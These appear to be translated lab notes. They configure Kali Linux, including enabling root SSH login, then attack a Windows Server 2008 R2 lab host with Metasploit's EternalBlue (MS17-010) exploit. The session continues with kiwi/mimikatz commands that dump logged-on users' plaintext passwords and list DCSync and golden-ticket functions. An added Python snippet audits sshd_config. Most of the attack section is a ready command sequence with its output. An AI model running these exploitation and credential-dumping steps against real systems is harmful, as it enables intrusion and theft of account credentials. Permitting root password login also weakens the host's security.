Switch the Kali apt sources to the domestic Aliyun mirror
vim /etc/apt/sources.list
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
apt-get update
Enable the SSH remote service
vim /etc/ssh/sshd_config
Set PermitRootLogin yes
PubkeyAuthentication yes
Port 22, remove the leading comment
systemctl restart ssh
systemctl status ssh
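Added example, not part of these notes: a small Python checker that reads an sshd_config and reports the effective values of the three settings edited above, applying sshd's first-match-wins rule and stopping at the first Match block, so that a PermitRootLogin yes left behind after the lab is easy to spot. The sample config text is constructed for the example.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample modelled on the sshd_config edits above, with a second
# PermitRootLogin line and a Match block added to show which value sshd uses.
SAMPLE_SSHD_CONFIG = """\
# Kali default, edited for the lab
Port 22
#ListenAddress 0.0.0.0
PermitRootLogin yes
PubkeyAuthentication yes
PermitRootLogin prohibit-password
Match User backup
    PermitRootLogin no
"""


def effective_settings(config_text: str) -> Dict[str, str]:
    """Return the global settings sshd would actually use.

    sshd_config rules: keywords are case-insensitive, comments and blank lines
    are ignored, keyword and value may be separated by whitespace or '=', and
    for each keyword the FIRST value wins. Everything from the first 'Match'
    line onward is conditional, so it is not part of the global configuration.
    """
    effective: Dict[str, str] = {}
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        key = parts[0].lower()
        if key == "match":
            break  # conditional block: global settings end here
        value = parts[1].strip() if len(parts) > 1 else ""
        effective.setdefault(key, value)  # first occurrence wins
    return effective


def review(config_text: str) -> Tuple[Dict[str, str], List[str]]:
    """Check the three settings the walkthrough touches; flag the risky one."""
    eff = effective_settings(config_text)
    findings: List[str] = []
    root = eff.get("permitrootlogin", "prohibit-password")  # sshd default
    if root.lower() == "yes":
        findings.append("PermitRootLogin yes: root may log in with a password; "
                        "prefer prohibit-password (key-only root) or no")
    if eff.get("pubkeyauthentication", "yes").lower() != "yes":
        findings.append("PubkeyAuthentication is disabled")
    if eff.get("port", "22") != "22":
        findings.append(f"sshd listens on non-default port {eff['port']}")
    return eff, findings
```

Run review(open("/etc/ssh/sshd_config").read()) on a real host to audit the file after the lab.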
Attacking Windows Server 2008 R2 with msf
Kali Linux 192.168.147.211
Windows Server 2008 R2 192.168.147.226
Nmap scan report for 192.168.147.226
Host is up (0.00084s latency).
Not shown: 990 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
msfconsole
search ms17_010
use auxiliary/scanner/smb/smb_ms17_010, checks whether the vulnerability is present
set RHOSTS 192.168.147.226
run
use exploit/windows/smb/ms17_010_eternalblue, launches the attack
set RHOSTS 192.168.147.226
run
Attack succeeded
screenshot
load -l, lists the extensions that can be loaded; mimikatz has been replaced by kiwi
bofloader
espia
extapi
incognito
kiwi
lanattacks
peinjector
powershell
priv
python
sniffer
stdapi
unhook
winpmem
load kiwi
kiwi_cmd sekurlsa::logonpasswords, extracts the plaintext passwords of logged-on users
creds_all
migrate 504, makes kiwi run more stably
help kiwi
creds_all: retrieve all credentials (parsed)
creds_kerberos: retrieve Kerberos credentials (parsed)
creds_livessp: retrieve Live SSP credentials
creds_msv: retrieve LM/NTLM credentials (parsed)
creds_ssp: retrieve SSP credentials
creds_tspkg: retrieve TsPkg credentials (parsed)
creds_wdigest: retrieve WDigest credentials (parsed)
dcsync: retrieve user account information via DCSync (unparsed)
dcsync_ntlm: retrieve a user account's NTLM hash, security identifier (SID) and relative identifier (RID) via DCSync
golden_ticket_create: create a golden Kerberos ticket
kerberos_ticket_list: list all Kerberos tickets (unparsed)
kerberos_ticket_purge: purge all in-use Kerberos tickets
kerberos_ticket_use: use a Kerberos ticket
kiwi_cmd: execute an arbitrary Mimikatz command (unparsed)
lsa_dump_sam: dump the LSA Security Account Manager database (unparsed)
lsa_dump_secrets: dump LSA secrets (unparsed)
password_change: change a user's password or hash
wifi_list: list the current user's Wi-Fi profiles and credentials
wifi_list_shared: list shared Wi-Fi profiles and credentials (requires SYSTEM)
shell, drops into a Windows command prompt